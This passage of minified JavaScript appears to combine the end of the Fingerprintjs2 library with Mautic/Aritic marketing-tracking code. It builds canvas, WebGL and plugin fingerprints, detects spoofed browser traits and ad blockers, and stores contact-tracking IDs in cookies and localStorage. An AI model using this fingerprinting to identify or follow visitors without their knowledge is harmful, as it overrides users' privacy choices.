t=["AcroPDF.PDF","Adodb.Stream","AgControl.AgControl","DevalVRXCtrl.DevalVRXCtrl.1","MacromediaFlashPaper.MacromediaFlashPaper","Msxml2.DOMDocument","Msxml2.XMLHTTP","PDF.PdfCtrl","QuickTime.QuickTime","QuickTimeCheckObject.QuickTimeCheck.1","RealPlayer","RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)","RealVideo.RealVideo(tm) ActiveX Control (32-bit)","Scripting.Dictionary","SWCtl.SWCtl","Shell.UIHelper","ShockwaveFlash.ShockwaveFlash","Skype.Detection","TDCCtl.TDCCtl","WMPlayer.OCX","rmocx.RealPlayer G2 Control","rmocx.RealPlayer G2 Control.1"];e=this.map(t,function(e){try{return new ActiveXObject(e),e}catch(t){return null}})}return navigator.plugins&&(e=e.concat(this.getRegularPlugins())),e},pluginsShouldBeSorted:function(){for(var e=!1,t=0,i=this.options.sortPluginsFor.length;t<i;t++){var a=this.options.sortPluginsFor[t];if(navigator.userAgent.match(a)){e=!0;break}}return e},touchSupportKey:function(e){return this.options.excludeTouchSupport||e.push({key:"touch_support",value:this.getTouchSupport()}),e},hasSessionStorage:function(){try{return!!window.sessionStorage}catch(e){return!0}},hasLocalStorage:function(){try{return!!window.localStorage}catch(e){return!0}},hasIndexedDB:function(){return!!window.indexedDB},getNavigatorCpuClass:function(){return navigator.cpuClass?navigator.cpuClass:"unknown"},getNavigatorPlatform:function(){return navigator.platform?navigator.platform:"unknown"},getDoNotTrack:function(){return navigator.doNotTrack?navigator.doNotTrack:navigator.msDoNotTrack?navigator.msDoNotTrack:window.doNotTrack?window.doNotTrack:"unknown"},getTouchSupport:function(){var e=0,t=!1;"undefined"!=typeof navigator.maxTouchPoints?e=navigator.maxTouchPoints:"undefined"!=typeof navigator.msMaxTouchPoints&&(e=navigator.msMaxTouchPoints);try{document.createEvent("TouchEvent"),t=!0}catch(i){}var a="ontouchstart"in window;return[e,t,a]},getCanvasFp:function(){var e=[],t=document.createElement("canvas");t.width=2e3,t.height=200,t.style.display="inline";var i=t.getContext("2d");return i.rect(0,0,10,10),i.rect(2,2,6,6),e.push("canvas winding:"+(i.isPointInPath(5,5,"evenodd")===!1?"yes":"no")),i.textBaseline="alphabetic",i.fillStyle="#f60",i.fillRect(125,1,62,20),i.fillStyle="#069",this.options.dontUseFakeFontInCanvas?i.font="11pt Arial":i.font="11pt no-real-font-123",i.fillText("Cwm fjordbank glyphs vext quiz, \ud83d\ude03",2,15),i.fillStyle="rgba(102, 204, 0, 0.2)",i.font="18pt Arial",i.fillText("Cwm fjordbank glyphs vext quiz, \ud83d\ude03",4,45),i.globalCompositeOperation="multiply",i.fillStyle="rgb(255,0,255)",i.beginPath(),i.arc(50,50,50,0,2*Math.PI,!0),i.closePath(),i.fill(),i.fillStyle="rgb(0,255,255)",i.beginPath(),i.arc(100,50,50,0,2*Math.PI,!0),i.closePath(),i.fill(),i.fillStyle="rgb(255,255,0)",i.beginPath(),i.arc(75,100,50,0,2*Math.PI,!0),i.closePath(),i.fill(),i.fillStyle="rgb(255,0,255)",i.arc(75,75,75,0,2*Math.PI,!0),i.arc(75,75,25,0,2*Math.PI,!0),i.fill("evenodd"),e.push("canvas fp:"+t.toDataURL()),e.join("~")},getWebglFp:function(){var e,t=function(t){return e.clearColor(0,0,0,1),e.enable(e.DEPTH_TEST),e.depthFunc(e.LEQUAL),e.clear(e.COLOR_BUFFER_BIT|e.DEPTH_BUFFER_BIT),"["+t[0]+", "+t[1]+"]"},i=function(e){var t,i=e.getExtension("EXT_texture_filter_anisotropic")||e.getExtension("WEBKIT_EXT_texture_filter_anisotropic")||e.getExtension("MOZ_EXT_texture_filter_anisotropic");return i?(t=e.getParameter(i.MAX_TEXTURE_MAX_ANISOTROPY_EXT),0===t&&(t=2),t):null};if(e=this.getWebglCanvas(),!e)return null;var a=[],r="attribute vec2 attrVertex;varying vec2 varyinTexCoordinate;uniform vec2 uniformOffset;void main(){varyinTexCoordinate=attrVertex+uniformOffset;gl_Position=vec4(attrVertex,0,1);}",n="precision mediump float;varying vec2 varyinTexCoordinate;void main() {gl_FragColor=vec4(varyinTexCoordinate,0,1);}",o=e.createBuffer();e.bindBuffer(e.ARRAY_BUFFER,o);var s=new Float32Array([-.2,-.9,0,.4,-.26,0,0,.732134444,0]);e.bufferData(e.ARRAY_BUFFER,s,e.STATIC_DRAW),o.itemSize=3,o.numItems=3;var l=e.createProgram(),h=e.createShader(e.VERTEX_SHADER);e.shaderSource(h,r),e.compileShader(h);var u=e.createShader(e.FRAGMENT_SHADER);return e.shaderSource(u,n),e.compileShader(u),e.attachShader(l,h),e.attachShader(l,u),e.linkProgram(l),e.useProgram(l),l.vertexPosAttrib=e.getAttribLocation(l,"attrVertex"),l.offsetUniform=e.getUniformLocation(l,"uniformOffset"),e.enableVertexAttribArray(l.vertexPosArray),e.vertexAttribPointer(l.vertexPosAttrib,o.itemSize,e.FLOAT,!1,0,0),e.uniform2f(l.offsetUniform,1,1),e.drawArrays(e.TRIANGLE_STRIP,0,o.numItems),null!=e.canvas&&a.push(e.canvas.toDataURL()),a.push("extensions:"+e.getSupportedExtensions().join(";")),a.push("webgl aliased line width range:"+t(e.getParameter(e.ALIASED_LINE_WIDTH_RANGE))),a.push("webgl aliased point size range:"+t(e.getParameter(e.ALIASED_POINT_SIZE_RANGE))),a.push("webgl alpha bits:"+e.getParameter(e.ALPHA_BITS)),a.push("webgl antialiasing:"+(e.getContextAttributes().antialias?"yes":"no")),a.push("webgl blue bits:"+e.getParameter(e.BLUE_BITS)),a.push("webgl depth bits:"+e.getParameter(e.DEPTH_BITS)),a.push("webgl green bits:"+e.getParameter(e.GREEN_BITS)),a.push("webgl max anisotropy:"+i(e)),a.push("webgl max combined texture image units:"+e.getParameter(e.MAX_COMBINED_TEXTURE_IMAGE_UNITS)),a.push("webgl max cube map texture size:"+e.getParameter(e.MAX_CUBE_MAP_TEXTURE_SIZE)),a.push("webgl max fragment uniform vectors:"+e.getParameter(e.MAX_FRAGMENT_UNIFORM_VECTORS)),a.push("webgl max render buffer size:"+e.getParameter(e.MAX_RENDERBUFFER_SIZE)),a.push("webgl max texture image units:"+e.getParameter(e.MAX_TEXTURE_IMAGE_UNITS)),a.push("webgl max texture size:"+e.getParameter(e.MAX_TEXTURE_SIZE)),a.push("webgl max varying vectors:"+e.getParameter(e.MAX_VARYING_VECTORS)),a.push("webgl max vertex attribs:"+e.getParameter(e.MAX_VERTEX_ATTRIBS)),a.push("webgl max vertex texture image units:"+e.getParameter(e.MAX_VERTEX_TEXTURE_IMAGE_UNITS)),a.push("webgl max vertex uniform vectors:"+e.getParameter(e.MAX_VERTEX_UNIFORM_VECTORS)),a.push("webgl max viewport dims:"+t(e.getParameter(e.MAX_VIEWPORT_DIMS))),a.push("webgl red bits:"+e.getParameter(e.RED_BITS)),a.push("webgl renderer:"+e.getParameter(e.RENDERER)),a.push("webgl shading language version:"+e.getParameter(e.SHADING_LANGUAGE_VERSION)),a.push("webgl stencil bits:"+e.getParameter(e.STENCIL_BITS)),a.push("webgl vendor:"+e.getParameter(e.VENDOR)),a.push("webgl version:"+e.getParameter(e.VERSION)),e.getShaderPrecisionFormat?(a.push("webgl vertex shader high float precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_FLOAT).precision),a.push("webgl vertex shader high float precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_FLOAT).rangeMin),a.push("webgl vertex shader high float precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_FLOAT).rangeMax),a.push("webgl vertex shader medium float precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_FLOAT).precision),a.push("webgl vertex shader medium float precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_FLOAT).rangeMin),a.push("webgl vertex shader medium float precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_FLOAT).rangeMax),a.push("webgl vertex shader low float precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_FLOAT).precision),a.push("webgl vertex shader low float precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_FLOAT).rangeMin),a.push("webgl vertex shader low float precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_FLOAT).rangeMax),a.push("webgl fragment shader high float precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_FLOAT).precision),a.push("webgl fragment shader high float precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_FLOAT).rangeMin),a.push("webgl fragment shader high float precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_FLOAT).rangeMax),a.push("webgl fragment shader medium float precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_FLOAT).precision),a.push("webgl fragment shader medium float precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_FLOAT).rangeMin),a.push("webgl fragment shader medium float precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_FLOAT).rangeMax),a.push("webgl fragment shader low float precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_FLOAT).precision),a.push("webgl fragment shader low float precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_FLOAT).rangeMin),a.push("webgl fragment shader low float precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_FLOAT).rangeMax),a.push("webgl vertex shader high int precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_INT).precision),a.push("webgl vertex shader high int precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_INT).rangeMin),a.push("webgl vertex shader high int precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.HIGH_INT).rangeMax),a.push("webgl vertex shader medium int precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_INT).precision),a.push("webgl vertex shader medium int precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_INT).rangeMin),a.push("webgl vertex shader medium int precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.MEDIUM_INT).rangeMax),a.push("webgl vertex shader low int precision:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_INT).precision),a.push("webgl vertex shader low int precision rangeMin:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_INT).rangeMin),a.push("webgl vertex shader low int precision rangeMax:"+e.getShaderPrecisionFormat(e.VERTEX_SHADER,e.LOW_INT).rangeMax),a.push("webgl fragment shader high int precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_INT).precision),a.push("webgl fragment shader high int precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_INT).rangeMin),a.push("webgl fragment shader high int precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.HIGH_INT).rangeMax),a.push("webgl fragment shader medium int precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_INT).precision),a.push("webgl fragment shader medium int precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_INT).rangeMin),a.push("webgl fragment shader medium int precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.MEDIUM_INT).rangeMax),a.push("webgl fragment shader low int precision:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_INT).precision),a.push("webgl fragment shader low int precision rangeMin:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_INT).rangeMin),a.push("webgl fragment shader low int precision rangeMax:"+e.getShaderPrecisionFormat(e.FRAGMENT_SHADER,e.LOW_INT).rangeMax),a.join("~")):a.join("~")},getAdBlock:function(){var e=document.createElement("div");e.innerHTML="&nbsp;",e.className="adsbox";var t=!1;try{document.body.appendChild(e),t=0===document.getElementsByClassName("adsbox")[0].offsetHeight,document.body.removeChild(e)}catch(i){t=!1}return t},getHasLiedLanguages:function(){if("undefined"!=typeof navigator.languages)try{var e=navigator.languages[0].substr(0,2);if(e!==navigator.language.substr(0,2))return!0}catch(t){return!0}return!1},getHasLiedResolution:function(){return screen.width<screen.availWidth||screen.height<screen.availHeight},getHasLiedOs:function(){var e,t=navigator.userAgent.toLowerCase(),i=navigator.oscpu,a=navigator.platform.toLowerCase();e=t.indexOf("windows phone")>=0?"Windows Phone":t.indexOf("win")>=0?"Windows":t.indexOf("android")>=0?"Android":t.indexOf("linux")>=0?"Linux":t.indexOf("iphone")>=0||t.indexOf("ipad")>=0?"iOS":t.indexOf("mac")>=0?"Mac":"Other";var r;if(r="ontouchstart"in window||navigator.maxTouchPoints>0||navigator.msMaxTouchPoints>0,r&&"Windows Phone"!==e&&"Android"!==e&&"iOS"!==e&&"Other"!==e)return!0;if("undefined"!=typeof i){if(i=i.toLowerCase(),i.indexOf("win")>=0&&"Windows"!==e&&"Windows Phone"!==e)return!0;if(i.indexOf("linux")>=0&&"Linux"!==e&&"Android"!==e)return!0;if(i.indexOf("mac")>=0&&"Mac"!==e&&"iOS"!==e)return!0;if(0===i.indexOf("win")&&0===i.indexOf("linux")&&i.indexOf("mac")>=0&&"other"!==e)return!0}return a.indexOf("win")>=0&&"Windows"!==e&&"Windows Phone"!==e||((a.indexOf("linux")>=0||a.indexOf("android")>=0||a.indexOf("pike")>=0)&&"Linux"!==e&&"Android"!==e||((a.indexOf("mac")>=0||a.indexOf("ipad")>=0||a.indexOf("ipod")>=0||a.indexOf("iphone")>=0)&&"Mac"!==e&&"iOS"!==e||(0===a.indexOf("win")&&0===a.indexOf("linux")&&a.indexOf("mac")>=0&&"other"!==e||"undefined"==typeof navigator.plugins&&"Windows"!==e&&"Windows Phone"!==e)))},getHasLiedBrowser:function(){var e,t=navigator.userAgent.toLowerCase(),i=navigator.productSub;if(e=t.indexOf("firefox")>=0?"Firefox":t.indexOf("opera")>=0||t.indexOf("opr")>=0?"Opera":t.indexOf("chrome")>=0?"Chrome":t.indexOf("safari")>=0?"Safari":t.indexOf("trident")>=0?"Internet Explorer":"Other",("Chrome"===e||"Safari"===e||"Opera"===e)&&"20030107"!==i)return!0;var a=eval.toString().length;if(37===a&&"Safari"!==e&&"Firefox"!==e&&"Other"!==e)return!0;if(39===a&&"Internet Explorer"!==e&&"Other"!==e)return!0;if(33===a&&"Chrome"!==e&&"Opera"!==e&&"Other"!==e)return!0;var r;try{throw"a"}catch(n){try{n.toSource(),r=!0}catch(o){r=!1}}return!(!r||"Firefox"===e||"Other"===e)},isCanvasSupported:function(){var e=document.createElement("canvas");return!(!e.getContext||!e.getContext("2d"))},isWebGlSupported:function(){if(!this.isCanvasSupported())return!1;var e,t=document.createElement("canvas");try{e=t.getContext&&(t.getContext("webgl")||t.getContext("experimental-webgl"))}catch(i){e=!1}return!!window.WebGLRenderingContext&&!!e},isIE:function(){return"Microsoft Internet Explorer"===navigator.appName||!("Netscape"!==navigator.appName||!/Trident/.test(navigator.userAgent))},hasSwfObjectLoaded:function(){return"undefined"!=typeof window.swfobject},hasMinFlashInstalled:function(){return swfobject.hasFlashPlayerVersion("9.0.0")},addFlashDivNode:function(){var e=document.createElement("div");e.setAttribute("id",this.options.swfContainerId),document.body.appendChild(e)},loadSwfAndDetectFonts:function(e){var t="___fp_swf_loaded";window[t]=function(t){e(t)};var i=this.options.swfContainerId;this.addFlashDivNode();var a={onReady:t},r={allowScriptAccess:"always",menu:"false"};swfobject.embedSWF(this.options.swfPath,i,"1","1","9.0.0",!1,a,r,{})},getWebglCanvas:function(){var e=document.createElement("canvas"),t=null;try{t=e.getContext("webgl")||e.getContext("experimental-webgl")}catch(i){}return t||(t=null),t},each:function(e,t,i){if(null!==e)if(this.nativeForEach&&e.forEach===this.nativeForEach)e.forEach(t,i);else if(e.length===+e.length){for(var a=0,r=e.length;a<r;a++)if(t.call(i,e[a],a,e)==={})return}else for(var n in e)if(e.hasOwnProperty(n)&&t.call(i,e[n],n,e)==={})return},map:function(e,t,i){var a=[];return null==e?a:this.nativeMap&&e.map===this.nativeMap?e.map(t,i):(this.each(e,function(e,r,n){a[a.length]=t.call(i,e,r,n)}),a)},x64Add:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var i=[0,0,0,0];return i[3]+=e[3]+t[3],i[2]+=i[3]>>>16,i[3]&=65535,i[2]+=e[2]+t[2],i[1]+=i[2]>>>16,i[2]&=65535,i[1]+=e[1]+t[1],i[0]+=i[1]>>>16,i[1]&=65535,i[0]+=e[0]+t[0],i[0]&=65535,[i[0]<<16|i[1],i[2]<<16|i[3]]},x64Multiply:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var i=[0,0,0,0];return i[3]+=e[3]*t[3],i[2]+=i[3]>>>16,i[3]&=65535,i[2]+=e[2]*t[3],i[1]+=i[2]>>>16,i[2]&=65535,i[2]+=e[3]*t[2],i[1]+=i[2]>>>16,i[2]&=65535,i[1]+=e[1]*t[3],i[0]+=i[1]>>>16,i[1]&=65535,i[1]+=e[2]*t[2],i[0]+=i[1]>>>16,i[1]&=65535,i[1]+=e[3]*t[1],i[0]+=i[1]>>>16,i[1]&=65535,i[0]+=e[0]*t[3]+e[1]*t[2]+e[2]*t[1]+e[3]*t[0],i[0]&=65535,[i[0]<<16|i[1],i[2]<<16|i[3]]},x64Rotl:function(e,t){return t%=64,32===t?[e[1],e[0]]:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t|e[0]>>>32-t]:(t-=32,[e[1]<<t|e[0]>>>32-t,e[0]<<t|e[1]>>>32-t])},x64LeftShift:function(e,t){return t%=64,0===t?e:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t]:[e[1]<<t-32,0]},x64Xor:function(e,t){return[e[0]^t[0],e[1]^t[1]]},x64Fmix:function(e){return e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[4283543511,3981806797]),e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[3301882366,444984403]),e=this.x64Xor(e,[0,e[0]>>>1])},x64hash128:function(e,t){e=e||"",t=t||0;for(var i=e.length%16,a=e.length-i,r=[0,t],n=[0,t],o=[0,0],s=[0,0],l=[2277735313,289559509],h=[1291169091,658871167],u=0;u<a;u+=16)o=[255&e.charCodeAt(u+4)|(255&e.charCodeAt(u+5))<<8|(255&e.charCodeAt(u+6))<<16|(255&e.charCodeAt(u+7))<<24,255&e.charCodeAt(u)|(255&e.charCodeAt(u+1))<<8|(255&e.charCodeAt(u+2))<<16|(255&e.charCodeAt(u+3))<<24],s=[255&e.charCodeAt(u+12)|(255&e.charCodeAt(u+13))<<8|(255&e.charCodeAt(u+14))<<16|(255&e.charCodeAt(u+15))<<24,255&e.charCodeAt(u+8)|(255&e.charCodeAt(u+9))<<8|(255&e.charCodeAt(u+10))<<16|(255&e.charCodeAt(u+11))<<24],o=this.x64Multiply(o,l),o=this.x64Rotl(o,31),o=this.x64Multiply(o,h),r=this.x64Xor(r,o),r=this.x64Rotl(r,27),r=this.x64Add(r,n),r=this.x64Add(this.x64Multiply(r,[0,5]),[0,1390208809]),s=this.x64Multiply(s,h),s=this.x64Rotl(s,33),s=this.x64Multiply(s,l),n=this.x64Xor(n,s),n=this.x64Rotl(n,31),n=this.x64Add(n,r),n=this.x64Add(this.x64Multiply(n,[0,5]),[0,944331445]);switch(o=[0,0],s=[0,0],i){case 15:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+14)],48));case 14:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+13)],40));case 13:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+12)],32));case 12:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+11)],24));case 11:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+10)],16));case 10:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+9)],8));case 9:s=this.x64Xor(s,[0,e.charCodeAt(u+8)]),s=this.x64Multiply(s,h),s=this.x64Rotl(s,33),s=this.x64Multiply(s,l),n=this.x64Xor(n,s);case 8:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+7)],56));case 7:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+6)],48));case 6:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+5)],40));case 5:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+4)],32));case 4:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+3)],24));case 3:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+2)],16));case 2:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+1)],8));case 1:o=this.x64Xor(o,[0,e.charCodeAt(u)]),o=this.x64Multiply(o,l),o=this.x64Rotl(o,31),o=this.x64Multiply(o,h),r=this.x64Xor(r,o)}return r=this.x64Xor(r,[0,e.length]),n=this.x64Xor(n,[0,e.length]),r=this.x64Add(r,n),n=this.x64Add(n,r),r=this.x64Fmix(r),n=this.x64Fmix(n),r=this.x64Add(r,n),n=this.x64Add(n,r),("00000000"+(r[0]>>>0).toString(16)).slice(-8)+("00000000"+(r[1]>>>0).toString(16)).slice(-8)+("00000000"+(n[0]>>>0).toString(16)).slice(-8)+("00000000"+(n[1]>>>0).toString(16)).slice(-8)}},e.VERSION="1.4.4",e});(function(){if(typeof window.CustomEvent==="function")return false;function CustomEvent(event,params){params=params||{bubbles:false,cancelable:false,detail:undefined};var evt=document.createEvent('CustomEvent');evt.initCustomEvent(event,params.bubbles,params.cancelable,params.detail);return evt;} CustomEvent.prototype=window.Event.prototype;window.CustomEvent=CustomEvent;})();var MauticJS=MauticJS||{};MauticJS.serialize=function(obj){if('string'==typeof obj){return obj;} return Object.keys(obj).map(function(key){return encodeURIComponent(key)+'='+encodeURIComponent(obj[key]);}).join('&');};MauticJS.documentReady=function(f){/in/.test(document.readyState)?setTimeout(function(){MauticJS.documentReady(f)},9):f();};MauticJS.iterateCollection=function(collection){return function(f){for(var i=0;collection[i];i++){f(collection[i],i);}};};MauticJS.log=function(){var log={};log.history=log.history||[];log.history.push(arguments);if(window.console){console.log(Array.prototype.slice.call(arguments));}};MauticJS.setCookie=function(name,value){document.cookie=name+"="+value+";";};MauticJS.createCORSRequest=function(method,url){var xhr=new XMLHttpRequest();method=method.toUpperCase();if("withCredentials"in xhr){xhr.open(method,url,true);}else if(typeof XDomainRequest!="undefined"){xhr=new XDomainRequest();xhr.open(method,url);} return xhr;};MauticJS.CORSRequestsAllowed=true;MauticJS.makeCORSRequest=function(method,url,data,callbackSuccess,callbackError){data=MauticJS.appendTrackedContact(data);var query=MauticJS.serialize(data);if(method.toUpperCase()==='GET'){url=url+'?'+query;var query='';} var xhr=MauticJS.createCORSRequest(method,url);var response;callbackSuccess=callbackSuccess||function(response,xhr){};callbackError=callbackError||function(response,xhr){};if(!xhr){MauticJS.log('MauticJS.debug: Could not create an XMLHttpRequest instance.');return false;} if(!MauticJS.CORSRequestsAllowed){callbackError({},xhr);return false;} xhr.onreadystatechange=function(e){if(xhr.readyState===XMLHttpRequest.DONE){response=MauticJS.parseTextToJSON(xhr.responseText);if(xhr.status===200){callbackSuccess(response,xhr);}else{callbackError(response,xhr);if(xhr.status===XMLHttpRequest.UNSENT){MauticJS.CORSRequestsAllowed=false;}} if(response.focusId){var a=document.createElement('script'),m=document.getElementsByTagName('script')[0];a.async=1;a.src=response.focusUrl;m.parentNode.insertBefore(a,m)}}};if(typeof xhr.setRequestHeader!=="undefined"){if(method.toUpperCase()==='POST'){xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');} xhr.setRequestHeader('X-Requested-With','XMLHttpRequest');xhr.withCredentials=true;} xhr.send(query);};MauticJS.parseTextToJSON=function(maybeJSON){var response;try{response=JSON.parse(maybeJSON);}catch(error){response=maybeJSON;} return response;};MauticJS.insertScript=function(scriptUrl){var scriptsInHead=document.getElementsByTagName('head')[0].getElementsByTagName('script');var lastScript=scriptsInHead[scriptsInHead.length-1];var scriptTag=document.createElement('script');scriptTag.async=1;scriptTag.src=scriptUrl;if(lastScript){lastScript.parentNode.insertBefore(scriptTag,lastScript);}else{document.getElementsByTagName('head')[0].appendChild(scriptTag);}};MauticJS.insertStyle=function(styleUrl){var linksInHead=document.getElementsByTagName('head')[0].getElementsByTagName('link');var lastLink=linksInHead[linksInHead.length-1];var linkTag=document.createElement('link');linkTag.rel="stylesheet";linkTag.type="text/css";linkTag.href=styleUrl;if(lastLink){lastLink.parentNode.insertBefore(linkTag,lastLink.nextSibling);}else{document.getElementsByTagName('head')[0].appendChild(linkTag);}};MauticJS.guid=function(){function s4(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1);} return s4()+s4()+'-'+s4()+'-'+s4()+'-'+s4()+'-'+s4()+s4()+s4();};MauticJS.dispatchEvent=function(name,detail){var event=new CustomEvent(name,{detail:detail});document.dispatchEvent(event);};function s4(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1);} MauticJS.mtcSet=false;MauticJS.appendTrackedContact=function(data){if(window.localStorage){if(mtcId=localStorage.getItem('mtc_id')){data['aritic_device_id']=localStorage.getItem('aritic_device_id');}} return data;};MauticJS.getTrackedContact=function(){if(MauticJS.mtcSet){return;} MauticJS.makeCORSRequest('GET',MauticJS.contactIdUrl,{},function(response,xhr){MauticJS.setTrackedContact(response);});};MauticJS.setTrackedContact=function(response){if(response.id){MauticJS.setCookie('mtc_id',response.id);MauticJS.setCookie('mtc_sid',response.sid);MauticJS.setCookie('aritic_device_id',response.device_id);MauticJS.mtcSet=true;try{localStorage.setItem('mtc_id',response.id);localStorage.setItem('mtc_sid',response.sid);localStorage.setItem('aritic_device_id',response.device_id);}catch(e){console.warn('Browser does not allow storing in local storage');}}};MauticJS.postEventDeliveryQueue=[];MauticJS.firstDeliveryMade=false;MauticJS.onFirstEventDelivery=function(f){MauticJS.postEventDeliveryQueue.push(f);};MauticJS.preEventDeliveryQueue=[];MauticJS.beforeFirstDeliveryMade=false;MauticJS.beforeFirstEventDelivery=function(f){MauticJS.preEventDeliveryQueue.push(f);};document.addEventListener('mauticPageEventDelivered',function(e){var detail=e.detail;var isImage=detail.image;if(isImage&&!MauticJS.mtcSet){MauticJS.getTrackedContact();}else if(detail.response&&detail.response.id){MauticJS.setTrackedContact(detail.response);} if(!isImage&&typeof detail.event[3]==='object'&&typeof detail.event[3].onload==='function'){detail.event[3].onload(detail)} if(!MauticJS.firstDeliveryMade){MauticJS.firstDeliveryMade=true;for(var i=0;i<MauticJS.postEventDeliveryQueue.length;i++){if(typeof MauticJS.postEventDeliveryQueue[i]==='function'){MauticJS.postEventDeliveryQueue[i](detail);} delete MauticJS.postEventDeliveryQueue[i];}}});MauticJS.pixelLoaded=function(f){MauticJS.onFirstEventDelivery(f);} MauticJS.checkForTrackingPixel=function(){if(!/in/.test(document.readyState)){setTimeout(function(){MauticJS.checkForTrackingPixel()},9)}else{var maxChecks=3000;var checkPixel=setInterval(function(){if(maxChecks>0&&!MauticJS.isPixelLoaded(true)){maxChecks--;return;} clearInterval(checkPixel);if(maxChecks>0){var params={},hash;var hashes=MauticJS.trackingPixel.src.slice(MauticJS.trackingPixel.src.indexOf('?')+1).split('&');for(var i=0;i<hashes.length;i++){hash=hashes[i].split('=');params[hash[0]]=hash[1];} MauticJS.dispatchEvent('mauticPageEventDelivered',{'event':['send','pageview',params],'params':params,'image':true});}},1);}} MauticJS.checkForTrackingPixel();MauticJS.isPixelLoaded=function(domOnly){if(typeof domOnly=='undefined'){domOnly=false;} if(typeof MauticJS.trackingPixel==='undefined'){MauticJS.trackingPixel=null;var imgs=Array.prototype.slice.apply(document.getElementsByTagName('img'));for(var i=0;i<imgs.length;i++){if(imgs[i].src.indexOf('mtracking.gif')!==-1){MauticJS.trackingPixel=imgs[i];break;}}}else if(domOnly){return false;} if(MauticJS.trackingPixel&&MauticJS.trackingPixel.complete&&MauticJS.trackingPixel.naturalWidth!==0){return true;} return false;};if(typeof window[window.AriticTrackingObject]!=='undefined'){MauticJS.input=window[window.AriticTrackingObject];if(typeof MauticJS.input.q==='undefined'){MauticJS.input.q=[];} MauticJS.inputQueue=MauticJS.input.q;if(!MauticJS.inputQueue.hasOwnProperty('push')){Object.defineProperty(MauticJS.inputQueue,'push',{configurable:false,enumerable:false,writable:false,value:function(){for(var i=0,n=this.length,l=arguments.length;i<l;i++,n++){MauticJS.dispatchEvent('eventAddedToMauticQueue',arguments[i]);} return n;}});} MauticJS.getInput=function(task,type){var matches=[];if(typeof MauticJS.inputQueue!=='undefined'&&MauticJS.inputQueue.length){for(var i in MauticJS.inputQueue){if(MauticJS.inputQueue[i][0]===task&&MauticJS.inputQueue[i][1]===type){matches.push(MauticJS.inputQueue[i]);}}} return matches;}}MauticJS.initGatedVideo=function(){MauticJS.videoElements=MauticJS.videoElements||document.getElementsByTagName('video');if(!MauticJS.videoElements.length){MauticJS.videoElements=null;return;} MauticJS.mauticInsertedScripts=MauticJS.mauticInsertedScripts||{};if("undefined"==typeof jQuery&&"undefined"==typeof 